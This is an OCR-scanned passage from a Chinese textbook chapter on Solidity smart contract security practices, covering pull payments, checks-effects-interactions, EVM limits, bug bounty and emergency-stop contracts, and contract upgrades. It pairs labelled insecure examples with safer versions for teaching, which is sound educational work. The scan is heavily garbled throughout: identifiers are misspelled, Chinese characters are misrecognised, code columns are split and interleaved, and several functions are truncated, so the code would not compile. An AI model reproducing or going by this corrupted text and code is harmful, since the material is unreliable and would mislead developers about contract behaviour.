address highestBidder; 

uint highestBid; 

mapping (address => uint) refunds; 
function bid() payable external 

{ 



































if (msg.value < highestBid) throw; 

if (highestBigdder != 0) 

{ 

// 记录 该 用 户 可 以 报销 的 退 蒜 

refunds [highestBidder]|] += highestBigd; 























tBidder = msg.sender; 


tBid = msg.value; 








function withdrawRefund() external 


{ 











uint refund = refunds [msg.sender]; 
refunds[msg.sender|] = 0; 
If (lImsg.sender.send(refund)) 


{ 




















// 状态 回 深 ， 因 为 sengd 函 数 调 用 没有 成 功 


refunds[msg.sender] = refund; 








6. 标 记 不 可 信 合 约 
当 与 外 部 合约 进行 交互 时 ， 以 变量 、 方 法 和 合约 接口 的 方式 命名 ， 使 其 明确 地 表示 与 它们 进行 交互 可 能 是 不 安全 的 。 这 适用 于 我 们 自己 的 调用 外 部 合约 的 功能 。 


// 不 安全 

// 不 清楚 外 部 函数 是 否 可 信 
Bank.withdraw (100)， 

function makeWithdrawal (uint amount) 


{ 























// 下 面 的 withdraw 函 数 没有 标记 是 否 为 可 信函 数 


Bank.withdraw (amount); 

















} 


// 比较 安全 
// 不 可 信函 数 外 部 调用 

UntrustedBank .withdraw (100);} 
TrustedBank.withdraw (100)，} 

// 由 xyz 公 司 维护 的 外 部 但 可 信 的 银行 智能 合约 。 
function makeUntrustedWithdrawal (uint amount) 


{ 
} 



































UntrustedBank .withdraw (amount); 





7. 保 持 回 退 功能 简单 


当 合 约 发 送 没 有 参数 的 消息 (或 没有 功能 匹配 ) 时 ， 将 调用 回 退 函 数 ， 并 且 只 能 从 send(0 调 用 时 访问 2300 个 Gas。 如 果 和 希望 能 够 从 send() 接 收 到 以 太 币 ， 则 在 回 退 函 数 中 可 以 做 得 最 多 的 就 是 记录 一 个 
事件 。 如 果 需 要 计算 或 更 多 的 gas， 应 使 用 适当 的 功能 。 


// 不 安全 





function() payable 
{ 


} 
// 安全 的 代码 


function deposit() payable external 


| 
} 


function() payable 


{ 


balances [msg.sender] += msg.value; 








balances [msg.sender] += msg.value; 





LogDepositReceived (msg.sender); 


8. 明 确 地 标记 函数 和 状态 变量 的 可 见 性 


应 明确 地 标记 函数 和 状态 变量 的 可 见 性 。 遂 数 可 以 指定 为 外 部 、 公 共 、 内 部 或 锥 有。 对 于 状态 变量 ， 外 部 是 不 可 能 的 。 明 确 标 注 可 见 性 将 使 得 更 容易 捕获 天 于 谁 可 以 调用 该 浮 数 或 访问 变量 的 错误 假 





















































] 又 。 
// 不 安全 
// 状态 变量 应 该 为 私有 变量 ， 但 必须 明确 注 明 ， 这 里 x 没有 注 明 是 私有 变量 
uint x; 











Function transfer () 


{ 





// the default is public 
// public code 








} 
// 安全 代码 ， 明 确 注 明 y 是 私有 变量 


uint private y; 
function transfer() public 





























// public coqe 公 开 的 代码 





function internalAction() internal 





internal code 内 部 代码 


一 种 恨 好 的 编程 习惯 做 法 是 ， 使 你 的 代码 失败 尽 可 能 的 快 。 来 看 一 个 不 好 的 函数 示例 。 


// 代码 失败 要 尽快 (Fail Fast) 
// 不 安全 的 代码 
contract BadFailEarly 


{ 




















uint constant DEFAULT SALARY = 50000; 
mapping (string => uint) nameToSalary; 
function getSalary (string name) constant returns (uint) 


{ 


























if (bytes (name) .length != 0 && nameToSalary[lname] != 0) 


{ 
} 


else 


// 不 安全 的 代码 
return DEFAULT SALARY; 


} 





return nameToSalarylnamel]; 














我 们 希望 悄悄 地 避免 一 个 合约 失败 ， 或 者 以 一 种 不 稳定 或 不 一 致 的 状态 继续 执行 。 函 数 getsalary 在 返回 存储 的 salary 之 前 正在 检查 条 件 ， 这 一 点 很 不 错 。 问 题 是 ， 当 这 些 条 件 无 法 满足 时 ， 返 回 的 是 
一 个 默认 值 。 这 就 可 能 会 隐藏 调用 方 的 错误 。 事 实 是 ,我 们 越 早 失败 ， 就 越 容易 找到 问题 。 如 果 我 们 隐藏 错误 ， 它 们 可 以 传播 到 代码 的 其 他 部 分 ， 造 成 难以 追溯 的 困难 。 一 种 比较 正确 的 方法 是 : 








contract GoodFailEarly 


{ 








mapping (string => uint) nameToSalary; 
function getSalary (string name) constant returns (uint) 


{ 
// 名 字 为 空 ， 抛 出 异常 


























if (bytes (name) .length == 0) throw; 

// 找 不 到 名 字 所 对 应 的 工资 ， 抛 出 异常 

if (nameToSalary[name] == 0) throw; 
return nameToSal] a nine 








这 个 版 本 还 展示 了 另 一 种 理想 的 编程 模式 ,分离 了 先决 条 件 ， 使 每 一 次 失败 都 是 孤立 的 。 


9. 支 持 Pull 支 付 超过 Push 支 付 


每 一 次 以 太 币 转移 (如 果 使 用 send 函 数 ) 就 意味 着 潜在 的 代码 执行 。 接 收 地 址 可 以 实施 一 个 回 滚 (Fallback) 函数 ， 该 冰 数 可 能 会 抛 出 一 个 错误 提示 。 因 此 ， 我 们 永远 不 要 相信 一 个 "send "函数 的 执 
了 是 没有 错误 的 。 


解决 方案 : 我 们 的 合约 应 该 支持 Pull 文 付 超过 Push 文 付 。 来 看 一 个 不 安全 的 竞价 函数 示例 ， 代 码 如 下 。 


// 不 安全 的 代码 


contract BadPushPayments 





address highestBidder; 
uint highestBid; 
function bid() 


{ 























if (msg.value < highestBid) throw; 
if (highestBigdder != 0) 




















// 把 bid 返回 给 前 赢家 
if (!highestBidder.send (highestBid)) 


// 不 安全 的 代码 


throw; 














} 


highest 
highes 


Bidder = msg.sender; 
Bid = msg.value; 








在 上 面 的 代码 ， 合 约 调用 "send "函数 并 检查 其 返回 值 。 这 个 看 起 来 很 合理 。 但 它 在 另外 一 个 函数 ("bid") 中 间 调 用 发 送 ， 这 是 不 安全 的 。 为 什么 ?因为 如 上 所 述 ，"send "可 以 触 必 另 一 个 合约 中 的 代 
码 的 执行 。 接 收 合约 可 以 实施 一 个 回 滚 函 数 ， 该 函数 可 能 会 抛 出 一 个 错误 。 


想象 一 下 ， 黑 客 可 以 写 一 个 拒绝 服务 的 合约 ， 每 次 有 人 向 该 合约 地 址 发 送 资 金 ， 就 抛 出 一 个 错误 。 如 果 有 人 将 试 出 价 高 于 这 个 呢 ? "send "调用 将 永远 失败 ， 使 竞价 出 现 异 常 。 一 个 以 错误 结束 的 函数 
调用 会 使 状态 不 会 改变 (任何 更 改 都 回 滚 ) 。 这 意味 着 没有 人 可 以 出 价 ， 合 约 也 就 失败 了 。 


最 简单 的 解决 方案 是 将 支付 分 开 到 一 个 不 同 的 函数 中 ， 让 用 户 请 求 (Pull) 资金 独立 于 合约 逻辑 的 其 余部 分 


contract GoodPullPayments 
{ 

address highestBidder; 

uint highestBid; 

mapping (address => uint) refunds; 
function bid() external 


{ 


























if (msg.value < highestBid) throw; 
if (highestBigdder != 0) 
{ 


} 
highest 
highest 


























refunds [highestBidder] += highestBigd; 





Bidder = msg.sender; 
Bid = msg.value; 





} 


function withdrawBid() external 

















uint refund = refunds [msg.sender]; 














refunds[msg.sender] = 0; 
If (Imsg.sender.send (refundgd)) 
{ 
refunds [msg.sender] = refund; 








} 


这 一 次 ， 我 们 使 用 一 个 映射 来 为 每 一 位 出 高 价 的 投标 人 存储 退 款 值 (refund) ， 提 供 一 个 函数 来 提取 他 们 的 资金 。 在 send 调 用 出 现 问 题 的 情况 下 ， 只 有 投标 人 受到 影响 。 这 是 一 种 简单 的 模式 ， 解 决 


了 许多 其 他 问题 (例如 重 入 ) 。 所 以 记 住 : 当 发 送 以 太 币 时 ,支持 Pull 支 付 超 过 Push 支 付 。 下 面 的 合约 支持 Pull 支 付 ， 可 以 作为 样本 (PullPaymentCapable.sol 是 这 个 合约 的 文件 名 ， 以 后 还 要 用 到 |。 








pragma solidity ^0.4.11;import 'http://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/17613/0EBPS/Text/../math/SafeMath.sol'; 
/xx * Qtitle PullPayment * Q@dev 基础 合同 支持 异步 发 送 请 求 付款 。 具 体 合 同 可 以 从 该 基础 合同 继 加 
承 来 使 用 asyncSend， 不 推荐 用 send */ 
contract PullPayment 
{ 



























































using SafeMath for uint256; 
mapping (address => uint256) public payments; 
uint256 public totalPayments; 
/xx * @dev 由 付款 人 调用 ， 以 存储 send 人 金额 作 为 信用 ， 便 于 pull1 函 数 后 续 调用 * 
@param des 资 金 目 的 地 地 址 
* Q@paramamount 要 转移 的 金额 */ 


// 函数 asyncsSeng 不 是 实际 发 送 资金 的 函数 ， 它 只 是 存储 以 后 被 提取 走 的 资 4 
function asyncSend(address dest, uint256 amount) internal 


{ 
































由 














payments[dest] = paymentsl[dest].add (amount); 
totalPayments = totalPayments.add (amount); 





} 


/xx yx adqev withdraw 累 计 余 额 ， 由 收 蒜 人 调用 */ 
function withdrawPayments () 


{ 














address payee = msg.sender; 
uint256 payment = payments [payeel]; 
require (payment != 0) ， 
require (this.balance >= payment) ， 
totalPayments = totalPayments.sub (Payment) ， 
Payments [payee]l = 0; 
assert (payee. send (Payment) ) ， 


} 











10. 函 数 代 码 的 顺序 : 条 件 ， 行动， 相互 作用 
作为 快速 失败 原则 的 延伸 ， 一 种 很 好 的 做 法 是 按 以 下 方式 编写 函数 。 
首先 ， 检 查 所 有 预先 的 条 件 (Condition) 。 
然后 ， 行 动 ， (Action) 改变 合约 的 状态 。 
最 后 ， 与 其 他 合约 进行 交互 (Interactions) ， 即 相互 作用 。 


“条 件 ， 行 动 ， 相 互 作用 ” ， 坚 持 这 种 函数 结构 将 避免 很 多 的 问题 。 让 我 们 来 看 看 使 用 这 种 模式 的 函数 的 一 个 例子 。 





function auctionEna () 


{ 





// 1. Conditions 条 件 

if (now <= auctionStart + biddingTime) throw; 
// 拍卖 还 没有 结 
if (ended)throw; 
// 此 函数 已 被 调用 
// 2. action 行动 

ended = true; 

AuctionEnded (highestBidder, highestBid); 
// 3. Interaction 相互 作用 
if (!beneficiary.sengd (highestBid))throw; 




































































这 是 符合 快速 失败 原则 的 ， 由 于 条 件 在 开始 时 就 进行 检查 。 它 也 将 潜在 危险 的 相互 作用 与 其 他 合约 一 起 留 到 了 最 后 。 
11. 了 解 平台 的 硬性 限制 


以 太 坊 虚拟 机 (EVM) 对 于 合约 能 够 做 的 事情 存在 很 多 硬性 限制 。 这 些 都 是 平台 级 的 安全 考虑 ， 但 如 果 不 了 解 它 们 ， 就 可 能 会 威胁 到 特定 合约 的 安全 。 让 我 们 看 看 下 面 看 似 正 确 的 员工 奖金 管理 代 
码 。 


// 不 安全 的 代码 ， 不 要 用 
contract BadArrayUse 


{ 





address[] employees; 
function payBonus () 


{ 














for (var i = 0; i < employees.length; i++) 


{ 





address employee = employees[il]; 
uint bonus = calculateBonus (employee); 
employee. send (bonus); 





} 











function calculateBonus (address employee) returns (uint) 





























{ 
// 一 些 昂贵 的 计算 nttp://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/17613/0OEBPS/Text/... 
} 


按照 常规 程序 编码 ， 上 面 的 代码 没有 问题 。 不 过 作为 智能 合约 ， 它 隐藏 了 3 个 基于 平台 限制 的 潜在 问题 。 


第 一 个 问题 是 ，i 的 类 型 将 会 是 uint8， 因 为 这 是 保持 值 为 0 所 需 的 最 小 类 型 。 如 果 数 组 有 超过 255 个 元 素 ， 函 数 循 环 不 会 终止 ， 直 到 Gas 耗 尽 。 此 时 更 好 的 方法 是 使 用 显 式 类 型 unit，unit 具 有 更 高 的 极 
限 。 如 果 可 能 的 话 ， 避 免 使 用 var 的 变量 。 下 面 是 第 一 步 优化 (还 有 两 个 问题 ， 下 面 会 介绍 ) 。 


// 仍然 不 安全 ， 不 要 使 用 
contract BadArrayUse 


{ 











address[] employees; 
function payBonus () 


{ 

















for (uint i = 0; i < employees.length; i++) 
{ 

address employee = employees[il]; 

uint bonus = calculateBonus (employee); 
employee. send (bonus); 





} 











function calculateBonus (address employee) returns (uint) 


{ 
// 一 些 昂 贵 的 计 自 
} 




















第 二 个 应 该 考虑 的 问题 是 Gas 限 制 。Gas 是 以 太 坊 的 一 种 机 制 ， 用 于 收取 网 络 资源 费用 。 每 一 次 修改 状态 的 函数 调用 都 会 消耗 Gas。 想 象 一 下 ，calculateBonus 在 一 些 复杂 计算 的 基础 上 计算 每 一 位 员 
工 的 奖金 ， 就 像 计算 许多 项 目的 利润 ， 必 将 消耗 大 量 的 Gas， 这 很 容易 达到 交易 或 区 块 的 Gas 限 制 。 如 果 一 个 交易 达到 了 Gas 限 制 ， 所 有 的 变化 将 被 恢复 ， 但 Gas 费 用 仍然 被 消耗 。 当 使 用 循环 时 ， 要 注意 
可 变 的 Gas 成 本 。 可 以 通过 将 奖金 计算 从 for 循 环 中 分 离 来 优化 合约 。 注 意 ， 随 着 员工 数组 的 增长 ，Gas 成 本 也 会 增长 ， 这 仍然 有 问题 。 

// 不 安全 代码 ， 不 要 使 用 


contract BadArrayUse 


{ 








address[] employees; 
mapping (address => uint) bonuses; 
function payBonus () 


{ 

















for (uint i = 0; i < employees.length; i++) 


{ 





address employee = employees[il]; 
uint bonus = bonuses[employeel]; 
// send is not safe here 
employee. send (bonus); 





} 
} 


function calculateBonus (address employee) returns (uint) 


// 通过 昂贵 的 计算 来 修改 奖金 额度 
uint bonus = 0; 
bonuses[employee] = bonus; 
































yd 


江 


后 一 个 问题 是 ， 调 用 堆栈 深度 限制 。EVM 调 用 堆 栈 有 一 个 1024 的 硬性 限制 。 这 意味 着 ， 如 果 嵌 套 调用 的 数量 达到 1024， 合 约 将 会 失败 。 攻 击 者 可 以 递归 调用 一 个 合约 1023 次 ,然后 调用 开发 者 合 
约 的 函数 ， 造 成 "send" 因 为 这 个 限制 而 默默 失败 。 可 以 利用 前 文 描述 过 的 Pull 支 付 合约 ， 使 用 asyncSend 来 防止 这 一 问题 的 出 现 。 


成 
代码 修改 后 如 下 ， 解 决 了 上 述 所 有 间 题 。 


// 继承 上 面 提 到 的 Pul1 支 付 合约 

import './PullPaymentCapable.sol'; 

contract GoodArrayUse is PullPaymentCapable 
{ 





address[] employees; 
mapping (address => uint) bonuses; 
function payBonus () 


{ 

















for (uint i = 0; i < employees.length; i++) 


{ 





address employee = employees[il]; 
uint bonus = bonuses[employeel]; 
asyncSend (employee, bonus); 
} 
} 


function calculateBonus (address employee) returns (uint) 


// 一 些 昂贵 的 计生 
uint bonus = 0; 
bonuses [employee] = bonus; 





























忆 结 一 下 ， 以 太 坊 虚拟 机 (EVM) 的 限制 如 下 。 
` 使 用 的 类 型 的 限制 。 
. 合约 Gas 成 本 的 限制 。 


调用 堆栈 深度 限制 。 
12 .编写 测试 代码 


编写 测试 代码 是 一 项 很 繁重 的 工作 ， 不 过 可 以 在 回归 测试 (Regression Test) 问题 上 拯救 开发 者 。 当 先前 正确 的 程序 因为 最 近 的 更 改 而 出 错时 ， 回 归 错 误 就 会 出 现 。 关 于 编写 测试 代码 ， 我 们 建议 可 
以 采用 发 表 在 Github 的 Truff le 的 测试 指导 : https://github.com/ConsenSys/truff le/blob/master/docs/getting started/testing.md。 


13. 容 错 和 自动 错误 赏 金 


在 智能 合约 编写 过 程 中 ， 代 码 审查 和 安全 审计 是 非常 重要 而 且 是 必需 的 。 但 是 ， 仪 仅 依 靠 代 码 审 查 和 安全 审计 是 不 能 满足 智能 合约 的 安全 需要 的 。 例 如 ， 著 名 的 The DAO 项 目 经 过 了 代码 审查 和 安全 
审计 ， 但 还 是 被 黑客 成 功 地 攻击 了 。 在 编写 代码 时 ， 我 们 需要 为 代码 运行 过 程 中 最 糟糕 的 情况 做 好 准备 。 如 果 在 我 们 的 智能 合约 中 有 一 个 漏洞 ， 则 需要 采取 恰当 的 方法 使 其 安全 地 恢复 。 不 仪 如 此 ， 我 们 
还 应 尽早 发 现 这 些 漏洞 。 把 智能 合约 纳入 自动 错误 赏 金 ， 可 以 为 我 们 提供 一 些 帮 助 。 


让 我 们 来 看 一 看 这 个 简单 的 自动 错误 赏 金 在 一 个 假设 Token 合 约 中 的 实现 。 


import './PullPaymentCapable.sol'; 
import './Token.sol'; 

contract Bounty is PullPaymentCapabl 
{ 








(0 








bool public claimed; 
mapping (address => address) public researchers; 
function () 








// 回 退 或 者 回 滚 函数 


if (claimed) throw; 














function createTarget () returns (Token) 


{ 





Token target = new Token (0); 
researchers[target] = msg.sender; 
return target; 











} 


function claiml(Token target) 











address researcher = researchersl[target]; 


// 检查 通 证 智能 合约 不 变量 以 查看 攻击 是 否 成 功 



































if (researcher == 0) throw; 
If (target.totalSupply() == target .balance) 
{ 

throw; 





} 
asyncSend (researcher, this.balance); 
claimed = true; 





和 以 前 一 样 ， 我 们 使 用 PullPaymentCapable 来 保护 付款 安全 。 这 个 Bounty 合 约 允 许 研 究 人 员 创 建 我 们 要 审计 的 Token 合 约 的 副本 ， 任 何人 都 可 以 通过 发 送 交易 到 Bounty 合 约 地 址 为 错误 赏 金 做 贡 


献 。 如 果 任 何 研究 人 员 


中 > 必 、 


Da 


名 的 遂 数 称 为 合约 的 回 滚 函 数 ， 每 次 合约 被 直接 发 送 资金 ， 该 函数 就 会 执行 


法 破坏 了 他 的 Token 合 约 的 副本 在 这 种 情况 下 ， 使 代 币 的 总 供应 量 不 同 于 Token 余 额 ) ， 他 会 得 到 赏 金奖 励 。 一 旦 赏 金 被 要 求 了 ,合约 将 不 会 再 接受 更 多 资金 (那个 无 


正如 上 面 所 看 到 的 ， 这 是 一 个 很 好 的 属性 。 它 是 一 个 单独 的 合约 ， 不 需要 修改 我 们 原始 的 Token 合 约 。 下 面 是 比较 完整 的 赏 金 合 约 ， 可 以 作为 我 们 以 后 的 参考 。 


pragma 


import './payme 
import './lifec 





solidity ^0.4.11; 





nt/PullPayment .sol'; 
ycle/Destructible.sol'; 








/** 
QQ 








title Bounty 




















* @dev 这 一 赏 金 将 支付 给 打破 智能 合约 不 变量 的 研究 员 。 xx/ 







































































contract Bounty is PullPayment, Destructible 
{ 
bool public claimed; 
mapping (address => address) public researchers; 
event TargetCreated(address createdAgddress); 
/大 大 
* Q@gev 回 退 或 者 回 滚 函数 允许 合约 所 有 者 获得 没有 被 提取 的 资金 
**/ 
function() payable 
{ 
require(!claimed); 
} 
/大 大 


* edqev 创建 和 部 署 
* msg .sender 作为 研究 员 




















* Q@return 返回 目 





目标 智能 合约 (目标 智能 合约 的 扩展 ) 








标 智 能 合约 





eateTarget () returns (Target) 





get target = Target (deployContract ()); 
earchers[target] = msg.sender; 











getCreated (target); 














urn target; 








* @gdev 用 于 部 署 目标 智能 合约 的 内 部 函数 





























Er 





合约 的 地 址 


deployContract() internal returns (address); 


能 合约 资金 发 送 给 证 明智 能 合约 有 问题 的 研究 员 

















n claim(Target target) 





address researcher = researchersl[target]; 











检查 智能 合约 的 不 变量 


























require (researcher != 0);，; 
require(!target.checkIinvariant ()); 
asyncSend (researcher, this.balance); 








imed = true; 











* Q@dev 您 的 主 智能 合约 应 继承 这 个 智能 合约 并 实现 checkInvariant 的 方法 


**/ 
function cr 
{ 
Tar 
res 
Tar 
ret 
} 
/** 
* Q@return 目标 智能 合 
**/ 
function 
/** 
* Q@dev 将 知 
* @param 目标 智能 
**/ 
functio 
{ 
2X 
cla 
} 
} 
/** 
* Qtitle Target 
*#% 
contract Target 
| 
/** 
* Q@dev 检查 智和 有 

















E 合 约 的 不 变量 ， 假 设 智能 合约 所 有 返回 值 一 直 都 是 True。 如 果 此 函数 返 



































False， 合 同 在 某 种 程度 上 被 打破 ， 并 且 处 于 不 一 致 的 状态 。 
* 为 了 赢得 赏 金 ， 安 全 研究 人 员 将 试图 造成 这 种 破坏 状态 
* return 如 果 所 有 不 变量 都 正确 ， 则 为 True， 否 则 为 false。 


**/ 





function checkI 

















returns (bool); 


} 


至 于 容错 ， 则 需 















































nvariant () 


修改 我 们 的 原始 合约 ， 添 加 额外 的 安全 机 制 。 一 个 简单 的 想法 是 让 一 个 合约 的 管理 者 冻结 合约 作为 


contract Stoppable 


{ 


address pub 
bool public 


lic curator; 
stopped; 











modifie 




















二 





modifie 

















bP- 





functio 


{ 





if 
CuUr 


} 
functio 


{ 





二 





[0 


r stopInEmergency 
(!stopped) _ 
r onlyInEmergency 
f (stopped) _ 
n Stoppable(address curator) 
(_ Curator == 0) throw; 
tor = CuraLory 





n emergencyStop() external 


(msg.sender != curator) throw; 


topped = true; 


Stoppable 人 允许 指定 一 个 可 以 停止 合约 的 管理 者 地 址 。 “停止 合约 ”是 什么 意思 * 


import './PullP 
import './Stopp 


contrac 


{ 





address pub 
uint public 





aymentCapable.sol'; 
able.sol"s 





t StoppableBid is Stoppable, PullPaymentCapable 








lic highestBidgder; 
highestBid; 














function St 
Stoppablel( 
PullPayment 
{} 

function bi 


{ 








名 
I 下 








oppableBid(address curator) 
curator) 
Capable () 

















d() external stopInEmergency 











(msg.value <= highestBid) throw; 
(highestBidder != 0) 








{ 


} 

hig 

hig 
} 


function wi 





asyncSend (highestBidder, highestBid); 











hes 
hesi 


Bidder = msg.sender; 
Bid = msg.value; 




















{ 


suicide 





thdraw() onlyInEmergency 


(curator); 





} 


号 


? 这 由 从 Stoppabl 继 承 的 子 合约 通 











一 种 通过 继承 来 实现 这 种 行为 的 方法 。 


以 均 


甬 过 使 用 函数 修改 器 stoplnEmergency 和 onlylnEmergency 来 定义 。 来 看 一 个 例子 。 


在 这 个 例子 中 ， 投 标 (bid) 现在 可 以 由 一 个 管理 者 (curator) 来 停止 ， 这 一 点 在 合约 被 创建 的 时 候 就 被 定义 好 了 。SstoppableBid 处 于 正常 模式 ， 只 有 bid 函 数 可 以 被 调用 。 如 果 发 生 奇怪 的 事情 并 且 
合约 处 于 不 一 致 的 状态 ， 管 理 者 可 以 介入 并 激活 紧急 状态 。 这 就 使 bid 函数 无 法 被 调用 ， 人 允许 withdraw 函 数 运行 。 


在 这 种 情况 下 ， 应 急 模式 只 会 让 管理 者 破坏 合约 并 找 回 资金 。 但 在 真实 的 情况 下 ， 找 回 逻 辑 可 能 更 复杂 (例如 ， 将 资金 返还 给 它们 的 所 有 者 ) 。 下 面 是 完整 的 stoppable 抽 象 智能 合约 ， 可 以 被 用 来 
继承 实现 具体 的 处 理 紧 急 状态 的 合约 。 


pragma solidity ^0.4.4; 
import "./Ownable.sol"; 
/* 
* Stoppable 可 以 停止 的 合约 轴 

* 人 允许 子 合约 继承 的 的 抽象 合约 并 且 具 有 紧急 停止 机 制 
**/ 

contract Stoppable is Ownable 


{ 
































bool public stopped; 
modifier StopInEmergency 





























if (!stopped) _ 














modifier onlyInEmergency 








if (stopped) _ 
} 
// 紧急 情况 下 合约 所 有 者 可 以 调用 ， 状 态 变量 Stoppeq 可 以 设置 为 True 


function emergencyStop () external onlyOwner 


{ 















































stopped = true; 


} 
// 紧急 情况 以 后 合约 所 有 者 可 以 调用 ， 状 态 变量 Stopped 可 以 设置 为 false, 回 到 正常 状态 



























































function release() external onlyOwner onlLyInEmerdency 
{ 

stopped = false; 

} 








14. 限 制 资金 存放 上 限 


保护 智能 合约 免 受 攻击 的 另 一 种 方法 是 限制 它们 的 范围 。 攻 击 者 最 有 可 能 会 将 管理 数 百 万 甚至 数 干 万 美元 的 合约 当 作 目标 。 换 句 话说 ， 并 不 是 所 有 的 智能 合约 都 需要 如 此 高 的 上 限 ， 面 临 那 么 大 的 风 
险 。 特 别 是 ， 如 果 智能 合约 所 代表 的 项 目 是 一 个 实验 型 的 项 目 ， 更 是 如 此 。 在 这 种 情况 下 ， 限 制 我 们 的 合约 接受 的 资金 数额 可 能 是 有 用 的 。 这 很 简单 ， 只 要 对 合约 地 址 余额 添加 一 个 硬性 限制 即 可 。 


这 里 有 一 个 关于 如 何 做 到 这 一 点 的 简单 例子 。 


contract LimitFunds 


{ 








uint LIMIT = 5000; 
function() { throw; } 
function deposit() 


{ 
} 









































if (this.balance > LIMIT) throw; http://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/17613/0EBPS/Text/... 




















5 


这 个 简短 的 回 滚 函 数 将 拒绝 向 合约 的 任何 直接 付款 。 如 果 合约 的 余额 超过 所 需 的 限制 或 者 出 现 异常 ， 将 会 首先 检查 deposit 函 数 。 更 多 有 趣 的 东西 ， 如 动态 或 管理 的 限制 也 很 容易 实现 。 
15 编写 简单 模块 代码 


安全 来 自 于 我 们 的 编程 意图 和 代码 实际 上 做 什么 之 间 的 匹配 。 这 是 非常 难以 验证 的 ， 尤 其 是 代码 非常 庞杂 、 混 乱 时 。 因 此 ， 编 写 简 单 模块 代码 是 很 重要 的 。 这 意味 着 ， 函 数 应 该 尽 可 能 短 ， 代 码 缺 点 
应 减少 到 最 小 ， 文 件 应 尽 可 能 小 ， 将 独立 逻辑 分 割 为 模块 ， 每 个 模块 都 承担 一 些 单一 的 责任 。 


命名 也 是 在 编码 时 表达 我 们 意图 的 最 好 方式 之 一 。 我 们 应 认真 思考 自己 选择 的 名 字 ， 使 代码 尽 可 能 清晰 。 下 面 看 一 个 不 良 命名 的 例子 一 一 来 自 The DAO 的 一 个 国 数 代码 
(https://github.com/slockit/DAO/blob/develop/DAO.sol#L618-L691) ， 一 共有 577 行 ， 太 长 并 且 很 复杂 。 这 可 能 也 是 The DAO 项 目 被 黑客 攻击 的 间接 原因 。 


作为 最 佳 实践 ， 智 能 合约 函数 最 多 30 ~ 40 行 代码 。 理 想 情 况 下 ， 应 该 能 够 在 不 到 一 分 钟 内 读 取消 数 并 了 解 它们 所 能 做 的 。 智 能 合约 函数 的 命名 必须 遵循 命名 规则 ， 不 要 产生 歧义 。 总 而 言 之 ， 尽 可 能 
地 让 智能 合约 编写 简单 ， 模 块 化 和 命名 良好 。 这 将 大 大 有 利于 别人 和 你 自己 审核 你 的 代码 。 


16. 不 要 从 零 开 始 编写 所 有 的 代码 
从 零 开 始 编写 所 有 的 代码 ， 既 浪费 时 间 又 不 安全 。 比 较 合理 的 方法 是 参考 一 些 比较 成 融 的 安全 框架 。 


比如 ， 可 以 参考 在 OpenZeppelin 项 目 发 表 的 智能 合约 安全 框架 示例 (https://github.com/OpenZeppelin/zep-solidity) 。 这 些 示例 已 经 在 GitHub repo 上 发 表 。 当 然 ， 由 于 智能 合约 的 安全 研究 和 
最 佳 实践 工作 才刚 刚 开 始 ， 目 前 还 没有 很 成 熟 的 智能 合约 安全 框架 。OpenZeppelin 是 一 个 比较 好 的 项 目 ， 其 提供 的 智能 合约 考虑 到 很 多 上 面 讨论 过 的 安全 模式 。 在 开发 自己 的 智能 合约 项 目 时 ， 应 该 按照 
具体 项 目 需 求 进行 修改 并 且 采 用 。 需 要 记 住 的 是 ， 我 们 一 定 要 谨慎 地 使 用 任何 智能 合约 安全 框架 ， 必 须 按照 我 们 自己 的 应 用 场景 进行 修改 。 


17. 断 路 器 (暂停 合约 功能 


当 发 现 错误 时 ， 可 以 使 用 断路 器 。 例 如 ， 如 果 发 现 错误 ， 大 多 数 操作 应 该 被 暂停 在 合约 中 ， 唯 一 的 函数 是 撤销 (withdraw) 。 可 以 向 某 些 受信 任 方 提供 触发 断路 器 的 能 力 ， 或 者 使 用 编程 来 自动 触发 
某 个 断路 器 。 这 与 前 面 提 到 的 Stoppable 安 全 模式 有 一 点 类 似 ， 只 是 用 不 同 的 场景 和 例子 进一步 说 明 这 一 安全 模式 的 重要 性 。 





bool private stopped = false; 
address private owner; 
modifier isAdmin () 


{ 








if(msg.sender != owner) 


throw; 


} 











unction toggleContractActive() isAdmin public 





} 






































// 可 以 添加 一 个 附加 的 修饰 符 ， 用 其 他 操作 《如 用 户 投票 ) 来 决定 是 否 停止 合约 
stopped = !stopped; 
} 


modifier StopInEmergency 























if (!stopped) _ 














modifier onlyInEmergency 








if (stopped) _ 


} 


function deposit() stopInEmergency public 

















// some code 


} 


function withdraw() onlyInEmergency public 




















// some code 


18. 升 级 已 损坏 的 智能 合约 


对 于 智能 合约 ， 如 果 发 现 错误 或 需要 进行 改进 ， 代 码 将 需要 更 改 。 为 智能 合约 设计 有 效 的 升级 系统 是 目前 还 在 研 究 的 领域 ， 我 们 无 法 在 本 书 履 盖 所 有 的 复杂 情况 ， 但 是 有 两 种 最 带 用 的 基本 方法 。 两 
者 之 中 更 简单 的 是 设 定 一 个 拥有 最 新 版 本 合约 地 址 的 注册 管理 机 构 合约 。 对 于 合约 用 户 来 说 ， 一 种 更 为 无 颖 的 方法 是 将 一 个 合约 转发 到 最 新 版 本 的 合约 上 。 无 论 采用 何 种 技术 ， 组 件 之 间 都 要 进行 模块 化 
和 良好 的 分 离 ， 因 此 代码 更 改 不 会 破坏 功能 ， 珀 立 数据 ， 或 者 需要 大 量 的 成 本 。 此 外 ， 将 复杂 的 逻辑 与 数据 存储 分 开通 常 是 有 益 的 。 因 为 这 样 ， 我 们 在 修改 合约 时 一 般 不 需要 重新 创建 所 有 数据 。 利 益 各 
方 如 何 决定 升级 代码 的 安全 方式 也 是 至 天 重要 的 。 根 据 合 约 ， 代 码 更 改 可 能 需要 由 单个 受信 任 方 、 一 组 成 员 或 全 部 利益 相关 者 的 投票 通过 。 如 果 这 个 过 程 可 能 需要 一 些 时 间 ， 可 以 考虑 如 何 利用 其 他 方法 
在 发 生 攻 击 的 情况 下 更 快速 地 做 出 反应 ， 例 如 使 用 上 面 介绍 过 的 紧急 停止 或 断路 器 。 


案例 1: 设 定 一 个 拥有 最 新 版 本 合约 地 址 的 注册 管理 机 构 合约 。 在 此 示例 中 ， 调 用 不 会 转 友 ， 因 此 用 户 每 次 在 与 之 进行 交互 之 前 都 应 该 获取 当前 地 址 。 


contract SomeRegister 


{ 
// 最 新 版 本 合约 地 址 的 注册 管理 机 构 合 约 
address backendContract; 
address[] previousBackends; 
address owner; 
function SomeRegister () 






































owner = msg.sender; 


} 


modifier onlyOwner () 


{ 











if (msg.sender != owner) 


throw; 
} 
} 
function changeBackend (address newBackend) public 
onlyOwner () 
returns (lool) 


{ 











if (newBackend != backendContract) 
{ 
